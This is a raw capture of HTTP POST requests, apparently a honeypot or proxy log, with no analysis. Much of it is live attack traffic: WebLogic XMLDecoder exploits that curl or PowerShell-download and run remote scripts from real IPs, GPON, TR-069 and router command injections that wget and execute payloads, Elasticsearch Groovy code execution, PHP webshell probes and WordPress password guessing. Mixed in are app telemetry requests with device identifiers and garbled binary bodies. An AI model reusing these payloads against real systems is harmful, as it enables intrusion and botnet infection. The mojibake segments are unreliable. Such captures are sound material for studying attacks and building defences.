RPELk9/IYTiXrFzUx0ujfayGlEDZhn+UH1UWQ4za6Z9xZuENVRxDXVyrPXcwB7iApqJcUhRoagk722HdW4u+rEIuEGGM+rz6yguY6cua30O7fIl7vxEeIXC3jGfGuLBUCh8/D2/pCe/kLLgMOQIsgZg3UEI2os0MiTJf5SzvWZP9r8iJra23WZ8fMZtbe7VuUSOkJ0cEwLg0kg5ozwiF3GZ+JPlV4KFYiBqyMA1AYCrsdSJmUUXiIPx2GttpgDUTQ+1k+VwJ+zEYRVqHGyPvVd/DAVgiWcCTUBJHv3z7Jzf/sdohsfRvZ30NHV6E/TWMc02u76c0H8Kvk8/BmCoRWwAP8RjnajBwEDB5KpfrhdvE7jVLJ98tNQ==

POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

eval=die('Hello, Peppa!'.(string)(111111111*9));

POST http://t12.proxy-checks.com/favicon.ico HTTP/1.1
Host: t12.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache



POST /hndUnblock.cgi HTTP/1.1
Accept: */*
Host: x.x.x.x
User-Agent: Wget(linux)
Content-Length: 384
Content-Type: application/x-www-form-urlencoded

submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache

FqRcyNibZP5kh9uJiq3YHoA8IW5a0QMaG/jdauFDEwc9F2/87gKU6kyE2rIvNi+b4yGrwIK43KEN8HNVC6LELYaEEyk2/JP+SZVy+nIMklUg/2lrqchtEJlGFYIs29Hup0IjlQvS0fMLSFG2tbMzFVyxq0X3M68E73dWZyMDmqG4gzWt6NI7mbF0XifhroQ8X31kzHr5KiVoliIqKEja1zTEGzUak+jmJRYIAS02M/7gpLUu7ffjwn64xAEhzJ8Y36hPQeTCI+zWQwg305916mZxeKEga/GaU2+fXBaCbl9EmmEtCspbPDUMGH6ZLh+CpkpKQ+pRLq7dIkREMuTBaKY330LWrHfOz40fck5qW8aUu0AF2pKRrPhDyESxXGpTwId93zdlIyu8EksNxgiygQ==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache

SvEMkN7LbbKXO3/J1DieuygfX7AQOL9/CPPJbA3fNcYaj3svESxFRuyXIlU226qbNtWTujmPL5zcaOdv2wWNHlBvDW5XRH99lMFT26/tO1+BodwUKxRk1zk6gLRYCObNTwBo12q+b3BW35LSiz7yEIC+mxuNPKMt5aSuQF95hUGP0svigGdpersP0Aic4BJ5BYdSFFqaJklIAjp2WPEZ612I02Ljl2HWWdiptWCUN1xOfLdko2mzHwjYIU9pUk+D5a/LhIEkLMB1OjklfE5ZRpwJwYIiEXQWvAxZUk3WYhMFgMFoxP3dzxVBhXFnntMRYMpHQlR3RpyYkvHdUA+wj7rh2ZgKNKBWplxmx0C8nEo8vTW7pi2wYMy6xLjF

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACcAVQBzAGUAcgAtAEEAZwBlAG4AdAAnACwAIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgApADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADIAMQAuADEANwAuADIAOAAuADEANQAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache

EKdXldzKYsuefFoxTIstsBtZfnAMmID71mpqXRSjCW4q6kKzromHJyUCUO9GgV6KnOLP+bvt+NeUpI5BpyckWVz2wBkzJq3RHejq/0KD2ue8zdxKlWK+9rIYY+qNJPgb+LjXXstg12oAfECLLXQP+5nPcAS0fKZvTX0xNnP5jd6M7RR7DHx9jmwBsY6OiuchoBGaRzCiho8/sIOm1Uit8vUNwEgoNGl4fd8ywJlHcfAOMBMW+zkno5U28F/CTbm0KU52PdXLd+Ur5cY5ySFbbRBe9Zg/L71/2DBZKsytrVz6X/7Iy7kTYLdMob8mCrDf1v08WBtmM2BOvm+8xCaPiZUlpqpNp1v7i2aI10OdR7hm1hSEtHoxMoEd9IPXJlOntttY7zjiYVnfk3sgvy1JAuLKerdcbNbwhovJrA==

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1494584421079
X-Umeng-Sdk: Android/5.6.4 Diamond+Royal%2F2.1.1+MI+4LTE%2F4.4.4+AAC2B6BE6AF07FA699F07E561EF0D262
Msg-Type: envelope
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Transfer-Encoding: chunked

2b7
1.05829200204e205468200142c@4b6f52f3884781c0fe2589e620de804843dd6bd59f9ffb6d1d0a5abd74c61459ñΩ£ë∞·xúï–=ãA1^_PØŸÂë≤Ö≈ädùô{vgv∫º©«%.9±ì…ÏÊ\H2∞	ëtjmas~ øÅñVb!∂
ä´πÄà TœÃ˚ˇk˘yH
 î<Êîrä)ß!F≤re∞Ä9oœÄgÏ4ò?≤vëÊÛ«zq§ßi–ŒÙ‘Œíª“á@5¢
ÔX{4IΩ˛D؆|8À+8À·î‡V'Rå*äIµ€T¥≠S-ÆZëjvø≠ö®Râ∂j°¬∏‡]âå1!◊í¢‰«‡çç÷\∆1Í—xƒqi∆t£0EGà_ÌÌyÿv`ßq–[
Øü[ìŒÁ6˜ÚtÈ1œ_ä…
®6fIn≥ X¿±Ê<πÊ|fi&≤⁄Ùd,*2mßô˚ÓÈÎ7/Üõ*˚√Câ}®=3π%5Á2î≤îˆ⁄Ú¸∞”›ø◊t∫˛•ìǺuC%(flÙ7IÕ˝Ù¯€˜˚§ª≥ı¸Ç^å”Q›œ^˜ú©Ã”<”8ö§X–ÿ}ııxΩ⁄ í±ÜÎRàElÍåi¨£LE]jAÎqîFH5èôÓ˚ÕÂ,ô&·fl´t?n^\̬	¬?ç À‡ˇèÅ¿o¡˝?'∞v˙ˇÍ$Ѹ9ı—;@000052f3884781c0fe2589e620de804843dd6bd59f9ffb6d1d0a5abd74c60000 21a7b85326ea9720163f7d42473601f4
0



post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 361

n=174321358232145&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgPMTE0LjEyNC4yNDMuMjUzHBgAGAAYABgAABocGBNhcHAuY2hhdC54aWFvbWkubmV0GRwYEjExMS4yMDYuMjAwLjI6NTIyMhUAFQIWiCIVABsAAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1496625706271&s=589FA0D306794207B9C5A4BA69BAB35F

post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST /xmlrpc.php HTTP/1.1
Host: x.x.x.x
Connection: keep-alive
Content-Length: 217
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-US,en;q=0.8
Cookie: wordpress_test_cookie=WP+Cookie+check

<?xml version="1.0"?><methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value><string>admin</string></value></param><param><value><string>narecumsafie55</string></value></param></params></methodCall>



POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

h=die('Hello, Peppa!'.(string)(111111111*9));

POST http://check.proxyradar.com/azenv.php?auth=152347789179&a=PSCMN&i=1082776598&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /UD/act?1 HTTP/1.1
Host: x.x.x.x:7547
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers
Content-Type: text/xml
Content-Length: 526

<?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body>  <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">   <NewNTPServer1>`cd /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2`</NewNTPServer1>   <NewNTPServer2></NewNTPServer2>   <NewNTPServer3></NewNTPServer3>   <NewNTPServer4></NewNTPServer4>   <NewNTPServer5></NewNTPServer5>  </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope>


POST http://api.vungle.com/api/v4/sessionStart HTTP/1.1
User-Agent: VungleDroid/3.3.4
X-VUNGLE-BUNDLE-ID: com.gamerun.subway.subwayrush
X-VUNGLE-TIMEZONE: Asia/Jakarta
Content-Type: application/json
X-VUNGLE-LANGUAGE: ind
Host: api.vungle.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 106

{"start":1494667820963,"pubAppId":"5811c733a1e0773e1a000028","ifa":"8776479c-11a4-48e7-8a70-96e640a29187"}

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
⁄‰¸,Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îN´3Y›∆√«∆fl

POST http://behacdn.ksmobile.net/cfcl HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 38

&KÜWÍÕ`i'c
K6ÍoòKÌVcpjBhC*8kä^H

POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1036
Content-Type: multipart/form-data; boundary=eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive

--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

1
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

73114
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

223e313bed87535815c57e37cd7d7858
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

0
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--eZJ62mmvaWusAoErdA4zJFHoTSx_MTyMu--


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 388
Cache-Control: no-cache

QaEPldqdY2fxDsA5lCqmAolQZU22g9FaJj46b5oMAhVjad0kqUxWleQ8Kw7HX5i74hPyhLiSPOTYXgm5pWKpYPCdyyfGl8I99BZklQEvbST79MxC6M65u3ZFGWQCfpiOy7Wq2rB2C1ZIoGw6hNzYouO14SG89tFHpvfww8UkCGFfKFbvReA3fuBOULThz/Nf8Q/9hdyh9ub9db34YZuv0fk1Uti2jjDSBhtoEYy/pliSAGQokimRMi2wyC0BVkajXhzJ/j6NVYfUoFKsHvBxnvpVWlXQ9jSrMLnBJn3mNiP6BEFtSDC943+yPbEj8n0Wh3RlXuqPT5q3UhapIqBoXdZoxS3RW4K7MvMSYmldfl3D2oQKbz/Sq9FTF0XAQzKaCAWw

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 29
Cache-Control: no-cache

log=jamesatchue&pwd=passw0rd1

POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48

leng=die('Hello, Peppa!'.(string)(111111111*9));

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
pÈ!3Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl

POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118

XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 416
Cache-Control: no-cache

R6FYwtPOZTXTOB919aU3dFKr6xC7SXEKdAiZRfjGPmZHmdgn4Gdzx0DW3UnNeVv8dt07mtUwJuYnqIkL8oeb4I2fViq1FiSACOKwXMa9v9yKsMSDvB9APolFNX2ldwAFLgfNoeqC2nayGxduV+voJGDpTq/QX1f1iPKuGpttoD4EJGCOoaAS/FWnprhZ4FnH3pRgya1qpDetqSESqsUtctyhhng29+5PTLowxIdrALwhVEZ0QI72caa8fI85vRe6VcKJfclSZxm1KLsrmoRdwenme3Nxu1Zvdx7pzed7PZIK5pJUJn09psPGb7hkAiUHw94NXPS+tNAsP68HPddvQALeEBeQ+x93VHD/A/6NvYuErHHTy0P/AOUNrxZRb3miXvcIJXXeTfuBk5GQLis8tHU9B2FxEg==

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache

log=admin&pwd=9999999

POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200

{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}

POST http://www.yaramaz.com/mobil/giris.php?v=2017430169535 HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11
Host: www.yaramaz.com
Pragma: no-cache
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 31
Cookie: misafirid=1230248; ipa2=1



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache

RqBcxtqcN2ZalzhF9BkS6XoS4W1M+N+2psAguKmVSfVP2S3WeQMpHmLKNjt8VUsxTarMhXuW/A2Ri265O724iDa2JIvEG1Cqs/OIfOcPwRBMhDq9YgG75ASxPurkKWE939Dvtc1CD/+MRQBnjLkWSfBS9UvWP9C081uYAoGYhTfGMN0G0V69LxOwNyvcm5NOZ22zW+nKYP9lbHlYGWOAYPAkDA1rpfqPZVY1ZR97HF+C2tzc2tbR9+BJ4I/kteMlSXg2oxP8qju1vnAMeko88DGXOyPLUwvw3etPgzYM8+247Gj5JPddB7/8BTRDna/JMyv+Mr73CljQurzikAaj14IsN1OmI/CPIuYkVS4fzAc=

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 432
Cache-Control: no-cache

S6FWyImZMt0NKUqnsxagu7YTBCsFVbFlBN64HYzBhpzBdFd0Sjn5llEQL6eAMhKMtYXa3gli4dqEpIoVarPL6XU8O8MHbvtBG1Zj0HzR7SW9Ofa+qGvjoQBk9Kv1vKh3RylYA1SkFuB6qUSd+coXO5+i2Fz3RlbVrJeJSMjEseb+scovQ3ZpdFPXErvg4aj/Wok8FFVtSoAZ7FXtu7Gh3aVym/INTdZzUj4gjzKzMJSea4zhEvBk0bbcXxWJB9+fNCv/E3B3Ket2FjunlUiA7evBeZD96lX4h1uILKMhmnKzNpTFRs6XvfREA0R5a7F0Uso3aCsAvET2brzXNQUd/cBTfs0YOIoMM4ARKI14OL0+w7lmECg15og0NsRZZ+ygZwB/54KBcIHeSGGzca1WBSy87eZTaePhODjJcqYXI0MZtA==

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache

FKxax4/KYWshH5jXKzoJp/MeUuT5lQq7MEZC+7TxU+6/UdrwBtla/H5SxnYW21+VCd+0WE9+Tgdym91cFYP1lB+F1JBEKjRsPLoZoZQ98Al0eBBHX7XTXtnxVx1NQf7eLWjR7wCnEE19+KCYO7WJyPH6CnRXasfr65+CKHdSsEW7lQaNiu9wcUp3h9q/p3kiKmH2L2oWGuppCddyNSDr7mE3T+ibW19P9vaS5cJAH6vOulNfo1XEr/31K7yjDAkb9yPWl420VZT/mI9lg3fNGBcCuiV0vno1bOpJZozeAV6SGGrT775KZLPgIQaANJWRHuRhafYlS/sVh3FRvMF7K+rEeAtfDJu1fBLJZbazCSb7Nkg6T3ac

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∏ÏÕËÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl

POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44

m=die('Hello, Peppa!'.(string)(111111111*9))

POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1494995583805
X-Umeng-Sdk: Android/6.0.4 Subway+rush%2F1.1.1+MI+4LTE%2F4.4.4+BE6EA616F4A88C79AB737EB2C10FAA27
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 6353

